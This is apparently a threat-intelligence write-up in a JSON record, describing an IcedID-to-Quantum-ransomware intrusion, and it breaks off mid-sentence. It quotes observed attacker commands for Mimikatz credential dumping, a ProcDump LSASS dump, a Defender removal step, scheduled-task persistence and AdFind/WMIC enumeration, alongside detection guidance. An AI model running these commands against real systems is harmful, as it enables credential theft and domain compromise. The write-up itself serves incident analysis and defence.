{
	"id": "879b4994-638d-480b-890b-694c08c23b52",
	"created_at": "2026-04-06T00:17:20.376792Z",
	"updated_at": "2026-04-10T03:24:24.000031Z",
	"deleted_at": null,
	"sha1_hash": "eb3444ea8d32605e1e3085e287554ec9bb571a0c",
	"title": "Malicious ISO File Leads to Domain Wide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8410518,
	"plain_text": "Malicious ISO File Leads to Domain Wide Ransomware\r\nBy editor\r\nPublished: 2023-04-03 · Archived: 2026-04-05 23:43:48 UTC\r\nIcedID continues to deliver malspam emails to facilitate a compromise. This case covers the activity from a campaign in late\r\nSeptember of 2022. Post exploitation activities detail some familiar and some new techniques and tooling, which led to \r\ndomain wide ransomware.\r\nThis case shares similarities of the IcedID campaign detailed by Malware-Traffic-Analysis.net, where the ADGet.exe\r\napplication was referenced.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThis intrusion began by the execution of IcedID malware contained within an ISO image. The ISO file was delivered to the\r\nvictim as part of a malspam campaign. Delivering payloads using an ISO image is a common technique observed in several\r\nprior cases. This technique has grown in use as threat actors look to evade Mark-of-the-Web controls.\r\nThe ISO image delivered a hidden directory containing a IcedID payload and a batch file. After being successfully mounted\r\n(double clicked), the end user only sees a malicious LNK file named documents inside the virtual hard drive. Clicking on the\r\nLNK file executes the batch file, which copies the IcedID payload to the user’s AppData\\Local\\Temp folder and loads it\r\nusing rundll32. A scheduled task was created at that time to maintain persistence on this host as well.\r\nUpon the execution of the IcedID payload, discovery commands using Windows utilities such as net, nltest, and ipconfig\r\nwere executed to discover domain trusts, domain admins, workstation configuration, etc. Around 16 hours after the initial\r\nexecution, the first Cobalt Strike beacon DLL was executed from the IcedID malware. This led to another round of\r\ndiscovery using net followed by AdFind.\r\nThe threat actor installed Atera and Splashtop remote access software via an MSI file. After that, the threat actors tried a\r\nGetSystem privilege escalation technique, which was blocked by antivirus. The threat actor then proceeded to exploit CVE-2020-1472 (ZeroLogon). This was followed by a batch script used to perform DNS lookups on hosts across the\r\nenvironment. After this, the threat actors began their first lateral movement to a server in the environment by copying their\r\nCobalt Strike DLL over to the host and executing it via a remote service. They then repeated the install of the remote access\r\nsoftware package.\r\nSome two hours later, another Cobalt Strike beacon was executed. With this beacon, the threat actors succeeded in elevating\r\nto SYSTEM on the beachhead host and proceeded to dump LSASS memory. Another round of activity took place using\r\nsystem tools, batch files, and Adget. Several more beacons were also loaded on the host using DLLs and PowerShell.\r\nAt this point, the threat actors had the clear text credentials for one of the domain administrator accounts and began moving\r\nlaterally to other systems. They issued remote commands using WMIC to conduct discovery, as well as distribute and\r\nexecute Cobalt Strike beacons. These actions, however, failed to get a beacon to launch on the domain controller being\r\ntargeted. After an hour or so of failures, the threat actors proceeded to RDP into the domain controller. Once there, they then\r\nloaded textbin[.]net, a pastebin style site, to download Cobalt Strike PowerShell code to the host in a file named pon.txt.\r\nTrying to execute this locally failed as well, and the threat actor moved on to downloading a variety of beacon executables\r\n(e.g. lsass.exe, lsasss.exe, etc.). These beacons, however, continued to crash and fail to run. Around an hour after starting the\r\nRDP session, the threat actors executed a PowerShell command to disable Windows Defender Antivirus on the host and\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 1 of 46\n\nreviewed Group Policy Objects for the domain. The Cobalt Strike beacons then began to execute successfully on the domain\r\ncontroller. Now, with Cobalt Strike beacons on the domain controller, the threat actors continued with discovery actions\r\nusing Invoke-ShareFinder and other PowerShell and system utilities.\r\nA few hours after, the threat actors installed the RSAT tools onto the beachhead host. However, they appear to have been\r\nunfamiliar with the tools and called up the help menu before using Get-ADComputer to collect the details on hosts in the\r\nenvironment. Back on the domain controller, ProcDump was used to dump LSASS memory. The PowerShell command Get-EventLog was then used to collect logon events on all domain administrators in the network.\r\nThe threat actors went quiet for around seven hours. When they returned, several more Cobalt Strike beacons were launched\r\nand several different Mimikatz implementations were executed on the domain controller, including a Mimikatz executable\r\nand a PowerShell implementation. For the next several hours, repeats of previous discovery actions and additional beacons\r\nexecuted using remote WMIC commands, were observed. During this time, Windows event logs point to the threat actors\r\ncompleting DCSync activities on one of the domain controllers. A new batch file, localdisk.bat, was also executed using\r\nremote WMI commands, to collect disk data on hosts around the environment. These discovery actions were completed\r\nseveral times again in other various batch files.\r\nOn the start of the fourth day, the threat actors continued to repeat their previous discovery and beacon spreading activity.\r\nNear the end of the day, the threat actors moved to install AnyDesk on several servers including a backup management host,\r\nlikely as a further means of persistence or later command and control. Next, the threat actor executed PowerShell to pop up\r\nan alert message on several hosts, letting the user know that the machine was infected with Cobalt Strike.\r\nAfter completing this activity, they used Rclone to exfiltrate copies of the backup files to the Mega.io cloud storage service.\r\nThe threat actors then staged a ransomware binary on the backup server but did not immediately execute it.\r\nAround two hours after dropping the file, it was executed using a command line argument, which included a list of hosts to\r\ntarget. This appeared to fail. The threat actors then proceeded to execute the payload manually in several ways, across\r\nvarious hosts. Finally, they connected to a domain controller and dropped three scripts; one to copy the ransomware\r\nexecutable to all hosts, one to reset every users password in the organization, and a final one to execute the staged\r\nransomware payload using PsExec.\r\nOnce executed, the ransomware left the ransom note README_TO_DECRYPT.html, which informs the victim that\r\nQuantum ransomware is responsible for the intrusion. The time to ransomware was just over 78 hours from the initial\r\nIcedID infection. All domain joined systems were encrypted with Quantum ransomware.\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0 and @MetallicHack.\r\nInitial Access\r\nThis intrusion began by the execution of a malicious LNK embedded in an ISO file (masquerading as a folder). The ISO file\r\nwas delivered as a ZIP archive via a malicious spam mail campaign.\r\nMalicious ISO file\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 2 of 46\n\nFirst, the user clicked on the ISO file, which created a new virtual hard drive disk. Such activity can be tracked with Event\r\n12 from Microsoft-Windows-VHDMP/Operational.\r\nThis ISO file contains a LNK named documents and a hidden directory named max containing a cobalt strike DLL beacon\r\nand a batch file.\r\nAs we can see below using LECmd by Eric Zimmerman, the file documents.lnk points to max\\eyewear.bat.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 3 of 46\n\nAs a consequence, when the victim clicked on the LNK file, it triggered the execution of the batch file eyewear.bat\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 4 of 46\n\nThe batch file eyewear.bat then executed two commands:\r\nIt first moved a DLL file named eyewear.dat, initially located in a hidden folder named max, to the user’s\r\nAppData\\Local\\Temp\\ folder :\r\nC:\\Windows\\system32\\cmd.exe /c D:\\max\\eyewear.bat\r\n➝ xcopy /s /i /e /h max\\easygoing.dat C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\*\r\nThen, DLL was executed using rundll32.exe :\r\nC:\\Windows\\system32\\cmd.exe /c D:\\max\\eyewear.bat\r\n➝ rundll32 C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\easygoing.dat,#1\r\nWant to block ISOs from automatically mounting when double clicked? Check out Huntress’s recent writeup.\r\nExecution\r\nOn the second day of the intrusion, the threat actors used the IcedID malware to drop a Cobalt Strike beacon and execut it\r\nusing regsvr32.exe.\r\nAfter beginning to move laterally, the threat actors used many other execution techniques such as PowerShell and\r\nexecutables run from their interactive RDP session in addition to DLLs.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 5 of 46\n\nA number of application crashes were observed across several compromised hosts. This activity was a result of the threat\r\nactors attempting to execute various dropped tools or beacons on the endpoint, triggering a Windows Error Reporting\r\n(WER) fault process.\r\nApplication crashes are recorded in the Windows Application event log under Event ID 1000 and 1001.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 6 of 46\n\nThe NSA Cyber Windows Event Monitoring Guidance, has the following statement:\r\nApplication crashes may warrant investigation to determine if the crash is malicious or benign.\r\nIn this case, the threat actors attempted to rectify the issue by deploying new beacons, renaming executable files by either\r\nappending a double extension or adding extra characters to the filename (i.e. lsass.exe to lsasss.exe).\r\nSome of these crashes may have been in response to being detected by Microsoft Defender. These signatures were found in\r\nthe logs on various hosts.\r\nHackTool:Win32/NamedPipeImpers.A\r\nTrojanDropper:PowerShell/Cobacis.B\r\nVirTool:MSIL/Menace.C!MTB\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 7 of 46\n\nThere was evidence that that the Cobalt Strike aggressor script AnnoyKit was leveraged to launch Internet Explorer via a\r\nCOM object.\r\nDecoded from Base64:\r\nThe decoded PowerShell function is readable in the PowerShell logs:\r\nThe PowerShell script used is publicly available, and can be found here, along with the CNA script.\r\nWe were unable to ascertain the purpose of running this script or how it furthered the threat actor’s goals.\r\nPersistence\r\nIcedID created a DLL named Utucka.dll just after the initial execution.\r\nA scheduled task was then created using this same DLL.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\{3A79715D-4FFB-50BE-8F3A-090CE7FB4097}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger id=\"TimeTrigger\"\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2012-01-01T12:00:00\u003c/StartBoundary\u003e\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 8 of 46\n\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED]\\AppData\\Local\\[REDACTED]\\[REDACTED]\\Utucka.dll\",#1 --oxoj=\"CategoryBeyon\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nFirst execution was observed on Day 1 at 8:00 PM and was repeated every hour.\r\nC:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\r\n ➝ rundll32.exe \"C:\\Users\\[REDACTED]\\AppData\\Local\\[REDACTED]\\[REDACTED]\\Utucka.dll\",#1 --oxoj=\"CategoryBeyo\r\nPrivilege Escalation\r\nNamed pipe impersonation\r\nThe named pipe impersonation technique was used multiple times on different hosts in order to get system privileges. This is\r\na common technique used by threat actors, and implemented by the GetSystemCobalt Strike command. As seen in the\r\nscreenshot below, GetSystem creates a service and connects to a pipe.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 9 of 46\n\ncmd.exe /c echo nbproc \u003e \\\\.\\pipe\\nbproc\r\ncmd.exe /c echo xgxfpw \u003e \\\\.\\pipe\\xgxfpw\r\ncmd.exe /c echo ylfdup \u003e \\\\.\\pipe\\ylfdup\r\nThe beacon creates the named pipe (seen in Sysmon EventID 17) and impersonates the NT AUTHORITY\\SYSTEM account\r\nused to connect to the pipe.\r\nThe MITRE Cyber Analytics Repository (CAR) details the Get System elevation, CAR-2021-02-002: Get System Elevation\r\nWinlogon Token Impersonation/Theft\r\nMultiple access to WinLogon with granted access 0x40 (PROCESS_DUP_HANDLE) were performed. Such access can be\r\ntracked with Sysmon event ID 10 (ProcessAccess). As explained in this blog written by Jonathan JOHNSON, opening a\r\nhandle to WinLogon in order to duplicate the token and call ImpersonateLoggedOnUser is a known Cobalt Strike technique.\r\nZeroLogon\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 10 of 46\n\nOn the second day of the intrusion, a spike in NetLogon traffic was observed from the beachhead host to a domain\r\ncontroller. This traffic then triggered several network signatures for CVE-2020-1472 otherwise known as ZeroLogon.\r\nET EXPLOIT Possible Zerologon Phase 1/3 - NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)\r\nET EXPLOIT Zerologon Phase 2/3 - NetrServerAuthenticate2 Request with 0x00 Client Challenge and Sign and Seal\r\nET EXPLOIT Zerologon Phase 3/3 - Malicious NetrServerPasswordSet2 (CVE-2020-1472)\r\nThe event logs corroborated a successful exploitation with a password update Event 4742 for one of the Domain Controller\r\npasswords.\r\nDefense Evasion\r\nMark-of-the-Web Bypass\r\nThe threat actors delivered the initial malware as a zip file, with the contents of a ISO file, which contained their payload to\r\ngain access to the target environment. These packages are designed to evade controls such as Mark-of-the-Web restrictions.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 11 of 46\n\nWindows Defender tampering\r\nOn one host, the threat actors ran the following command to try and clear the way for their activity, likely due to the\r\ndifficulty the threat actors were having with beacons crashing.\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender-GUI\r\nThis command was downloaded from a remote site to a file named pon!.txt and then executed locally.\r\nProcess injection\r\nMultiple suspicious calls to the function CreateRemoteThread (Sysmon Event ID 8) were observed. This is a known\r\nbehavior of Cobalt Strike and its function shinject, which can be used to inject a new beacon or a specific program to\r\nanother process on the victim’s computer.\r\nAs a result, we observed abnormal winlogon.exe process behavior; winlogon.exe performed DNS requests (Sysmon event\r\nID 22) to a Cobalt Strike C2 domain guteyutu[.]com.\r\nThe injection is also visible from memory dumps. Several hosts showed rundll32 processes exhibiting common process\r\ninjection behavior, where the MZ file header is seen in the starting memory address in rundll32 processes with\r\nPAGE_EXECUTE_READWRITE permissions.\r\nMany of these beacons could also be detected in memory scanning with the Malpedia Cobalt Strike rule. A sample of a\r\nscanning run is displayed below:\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 12 of 46\n\nHost\r\nProcess\r\nID\r\nProcess Name Command Line Yara Rule\r\nSERVERA 568 winlogon.exe winlogon.exe win_cobalt_strike_auto\r\nSERVERA 4284 RuntimeBroker.exe\r\nC:\\Windows\\System32\\RuntimeBroker.exe\r\n-Embedding\r\nwin_cobalt_strike_auto\r\nSERVERB 9936 rundll32.exe C:\\Windows\\syswow64\\rundll32.exe win_cobalt_strike_auto\r\nBEACHHEAD 996 svchost.exe\r\nC:\\Windows\\system32\\svchost.exe -k\r\nDcomLaunch -p -s LSM\r\nwin_cobalt_strike_auto\r\nBEACHHEAD 1888 svchost.exe\r\nC:\\Windows\\System32\\svchost.exe -k\r\nLocalSystemNetworkRestricted -p -s\r\nAudioEndpointBuilder\r\nwin_cobalt_strike_auto\r\nBEACHHEAD 2220 winlogon.exe winlogon.exe win_cobalt_strike_auto\r\nBEACHHEAD 7032 rundll32.exe C:\\Windows\\syswow64\\rundll32.exe win_cobalt_strike_auto\r\nSERVERC 3328 rundll32.exe C:\\Windows\\syswow64\\rundll32.exe win_cobalt_strike_auto\r\nCredential Access\r\nMultiple tools and scripts were used to access and collect credentials from compromised hosts. There were several variants\r\nof Mimikatz in binary and PowerShell form:\r\n\"C:\\ProgramData\\mimikatz.exe\"\r\n\"C:\\ProgramData\\mimikatz.exe.exe\"\r\n\"C:\\ProgramData\\mimikatz_cryptovanniy.exe\"\r\n\"C:\\ProgramData\\notepad.exe\" \"C:\\ProgramData\\katz.ps1\r\nCommands used to collect credentials and export to text files stored in the C:\\ProgramData folder included the following:\r\nC:\\Windows\\system32\\cmd.exe /C mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\" \u003e\u003e c:\\program\r\nC:\\Windows\\system32\\cmd.exe /C mimikatz.exe privilege::debug sekurlsa::logonPasswords full samdump::hashes exi\r\nC:\\Windows\\system32\\cmd.exe powershell -ep bypass -C \"import-module .\\katz.ps1;Invoke-Katz\" \u003e mimi.txt\r\nDCSync\r\nCredentials were also dumped via DCSync using two compromised high privilege accounts. The activity was observed in\r\nWindows Security Event ID 4662, with known indicators including non-computer based account, an access mask of 0x100,\r\nand object IDs.\r\n1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 - DS-Replication-Get-Changes-All\r\n1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 - DS-Replication-Get-Changes\r\nDCSync was observed across 12 events, with separate events for each object ID. It is likely the operator used the Cobalt\r\nStrike DCSync command, having observed them already enter this directly in the host OS command shell.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 13 of 46\n\nFor additional details, SpecterOps has an article covering the DCSync technique.\r\nCode injection in LSASS\r\nMultiple injections into the LSASS process were observed on multiple hosts.\r\nThreat actors used the function CreateRemoteThread in order to inject malicious code in LSASS process to access\r\ncredentials.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 14 of 46\n\nProcess dump of the LSASS process was undertaken using the Sysinternals ProcDump utility:\r\nThis process was invoked by RunDLL32.exe which was an injected Cobalt Strike beacon reaching out to the command and\r\ncontrol server at 111.90.143[.]191.\r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\n ➝ c:\\windows\\temp\\procdump64.exe -accepteula -ma lsass.exe fwtsqmfile00.dmp\r\nDiscovery\r\nClassic ransomware discovery stages\r\nA number of familiar discovery techniques were utilized using various OS commands to discover information relating to the\r\nuser, host, and network configuration. Standard time discovery, domain trust discovery, workstation configuration discovery,\r\nand use of the net command to discover standard accounts and groups were observed.\r\nFrom the IcedID malware running via Rundll32, the following LOLBAS commands were observed:\r\nrundll32 C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\easygoing.dat,#1\r\n➝ nltest /domain_trusts /all_trusts\r\n➝ nltest /domain_trusts\r\n➝ net view /all /domain\r\n➝ net view /all\r\n➝ net group \"Domain Admins\" /domain\r\n➝ cmd.exe /c chcp \u003e\u00262\r\n➝ ipconfig /all\r\n➝ net config workstation\r\n ➝ systeminfo\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 15 of 46\n\nFrom Nigu.exe (Cobalt Strike beacon), the following LOLBAS commands were observed:\r\n\"C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\Nigu.exe\"\r\n➝ C:\\Windows\\system32\\cmd.exe /C net group \"domain admins\" /domain\r\n➝ C:\\Windows\\system32\\cmd.exe /C net group \"enterprise admins\" /domain\r\n➝ C:\\Windows\\system32\\cmd.exe /C net time\r\n➝ C:\\Windows\\system32\\cmd.exe /C net user [REDACTED] /domain\r\nDiscovery commands observed from other Cobalt Strike beacons using LOLBAS included:\r\nsysteminfo\r\nnetstat -anop tcp\r\ncmd.exe /C echo %%temp%%\r\ncmd.exe /C hostname\r\ncmd.exe /C nslookup hostname\r\nRSAT installation to enumerate domain computers properties\r\nFollowing the first discovery stage, the threat actor installed RSAT (Remote Server Administration Tools) on the beachhead\r\nhost, which contains the ActiveDirectory PowerShell Module.\r\nrundll32.exe\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Add-WindowsCapability –online –Name “Rsat.ActiveDirec\r\n ➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Import-Module ActiveDirectory\r\nOne interesting fact to notice, the threat actors had to consult the help menu of Get-ADComputer and Export-CSV using\r\nGet-Help.\r\nrundll32.exe\r\n ➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-Help Export-CSV\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-Help Get-ADComputer\r\nDomain computers’ properties were then enumerated using the Get-ADComputer. PowerShell cmdlet and names were\r\nexported in a CSV file named ADComputers.csv.\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-CSV \"\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-CSV -\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-csv C\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Identity [REDACTED] -Properties *\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe get-ADcomputer -Filter * | Where-Object {$a=$_.name;\r\nIn addition, threat actors searched for Active Directory related DLLs in other directories:\r\nC:\\Windows\\system32\\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll\r\nC:\\Windows\\system32\\cmd.exe /C where /r C:\\Windows\\WinSxS\\ *Microsoft.ActiveDirectory.Management.dll*\r\nHands on keyboard!\r\nWe observed mistakes made by the threat actors during hands-on keyboard activities, these included typos and incorrect use\r\nof commands. An example of an incorrect named command was nslook up (should have been nslookup) that also incorrectly\r\npassed the username, instead of the host name.\r\nC:\\Windows\\system32\\cmd.exe /C nslook up [REDACTED]\r\nC:\\Windows\\system32\\cmd.exe /C nslookup USERFirstName UserLastName\r\nAnother example, the misspelling of administrators:\r\nnet group administartors /domain\r\nFurther examples included typos of commands:\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 16 of 46\n\nC:\\Windows\\system32\\cmd.exe /C net ttime\r\nOther operator errors observed included the use of Cobalt Strike commands being passed as a parameter instead of a beacon\r\ntask.\r\nThe use of DCSync is documented in a previous TheDFIRReport titled ‘Cobalt Strike, a Defender’s Guide\r\nDuring AD enumeration, the operator made use of the PowerShell Get-help cmdlet to troubleshoot the following:\r\npowershell.exe Get-Help Export-CSV\r\npowershell.exe Get-Help Get-ADComputer\r\nTwo file sharing web sites were used to access files, these were dropmefiles[.]com and file[.]io. Both of these services were\r\naccessed on day two from one Domain Controller on the network, with file downloads relating to tooling/scripts. On day\r\nthree, a second Domain Controller was observed accessing the dropmefiles[.]com domain.\r\nReviewing the WebCacheV01.dat on the domain controllers, reveals more details on the sites loaded, including the files that\r\nwhere downloaded from those sites:\r\nThe threat actors downloaded the lsass.exe beacon from their attacker hosted infrastructure at 199.127.60[.]117.\r\nIn addition, the threat actors also used Internet Explorer on the domain controller to search Bing.\r\nThis is quite unusual to search directly on the victim’s browser. The current search results point to how to change the hidden\r\nview attribute in file explorer in reference to the ProgramData folder.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 17 of 46\n\nShare discovery with Invoke-ShareFinder\r\nOther tools observed in use, included Invoke-ShareFinder, this is a common tool that we frequently encountered in cases for\r\nenumerating network shares and identifying data and potential targets. We have a detailed report covering Invoke-ShareFinder. In this case, there is a clear indication that the operator launched the Invoke-ShareFinder command via Cobalt\r\nStrike, as observed in Event ID 800:\r\nWindows Security Logs discovery\r\nOnce the threat actors had achieved privilege escalation by compromising administrator accounts, an unusual, but interesting\r\ndiscovery technique was observed as seen below.\r\nC:\\Windows\\system32\\cmd.exe /C powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*\u003cREDACTED\u003e*\r\nExecuting this query would return all events in the Security log that references the specified account and with a source\r\nnetwork address. Events returned would include process creation, logins, etc.\r\nIts likely that this discovery technique forms an extension of T1033 – System Owner/User Discovery, where the threat actor\r\nwas leveraging this data source to understand the account pattern of life, any indicators from compromise, and to potentially\r\nblend in adversary activities.\r\nBase64 for the win\r\nOther discovery activities observed included a domain host discovery script via PowerShell. This was double base64\r\nencoded.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 18 of 46\n\nDecoding this revealed another PowerShell Base64 encoded string:\r\nThe -e is short for -EncodedCommand. The base64 encoding starts with JAB that is a common pattern for UTF-16 starting\r\nwith $. Refer to the Base64 cheatsheet by Forian Roth here.\r\nThere are many different variations of EncodedCommand, with shorthand and aliases available. Unit42 (PaloAlto) provides\r\na good article on trends and observations of PowerShell encoded commands:\r\nDecoding this again using CyberChef shows the resulting PowerShell script:\r\nMore tools dropped by threat actors\r\nOther binaries and scripts were dropped onto one endpoint:\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 19 of 46\n\nThe ns.bat file contained thousands of nslookup commands with a corresponding hostname from the network, with output\r\nappended to a ns.txt file.\r\nADGet\r\nAn Active Directory collection tool named ADGet was dropped into a user’s temp folder and executed with an output\r\nfilename argument. No file meta data is provided. Its a simple to use tool, the application is invoked from the command line\r\nand passes an output file name to save enumerated AD objects.\r\nADGet is an uncommon tool, however, its function is very similar to ADfind–the key difference is that LDAP queries are\r\nnot passed, they are instead coded into the binary itself.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 20 of 46\n\nThe AD objects will be enumerated generating a zip output file containing the following TSV (tab separated files) files if\r\nusing a default configuration:\r\nThese files can be viewed with any editor or reader that supports CSV or TSV.\r\nAdFind\r\nWhile Adget was seen used, prior to that tool being run the threat actors also deployed the tried and true AdFind, which was\r\nrenamed to find.exe and called using find.bat.\r\nAnother batch file named AD.bat was dropped into the ProgramData folder on one host and used adfind to enumerate AD\r\nobjects.\r\nThe AD.bat file had the following commands:\r\nfor /f \"delims=\" %%A in ('dir /s /b %WINDIR%\\system32\\*htable.xsl') do set \"var=%%A\"\r\nadfind.exe -f (objectcategory=person) \u003e ad_users.txt\r\nadfind.exe -f objectcategory=computer \u003e ad_computers.txt\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 21 of 46\n\nadfind.exe -f objectcategory=computer -csv name operatingSystem \u003e ad_computers_enum.txt\r\nadfind.exe -f (objectcategory=organizationalUnit) \u003e ad_ous.txt\r\nadfind.exe -subnets -f (objectCategory=subnet) \u003e ad_subnets.txt\r\nadfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nadfind.exe -gcb -sc trustdmp \u003e ad_trustdmp.txt\r\nInterestingly, the first line in the batch file denotes the WMI output configuration in HTML form (from XSL file\r\nc:\\windows\\system32\\wbem\\en-US\\htable.xsl). The HTML was never used. Its likely the code was reused from other open\r\nsource pentest enumerations scripts available, such as:\r\nWMIC\r\nThe use of WMIC was leveraged by a batch file named dS.bat that queried a number of target hosts to determine the host\r\ndisk drive configuration. This can be useful to determine drives, including mounted network shares.\r\nwmic /node:\u003cREDACTED\u003e /user:\"\u003cREDACTED\u003e\" /password:\"\u003cREDACTED\u003e\" logicaldisk get caption,description,drivetype\r\nThe dS.bat file was executed by the injected Rundll32.exe process.\r\nDuring hands-on discovery by the threat actors, the Group Policy was viewed by the Microsoft Management Console\r\napplication to view Domain Group Policy Objects.\r\nThis can provide useful information concerning any restrictions or configuration settings for hosts on the 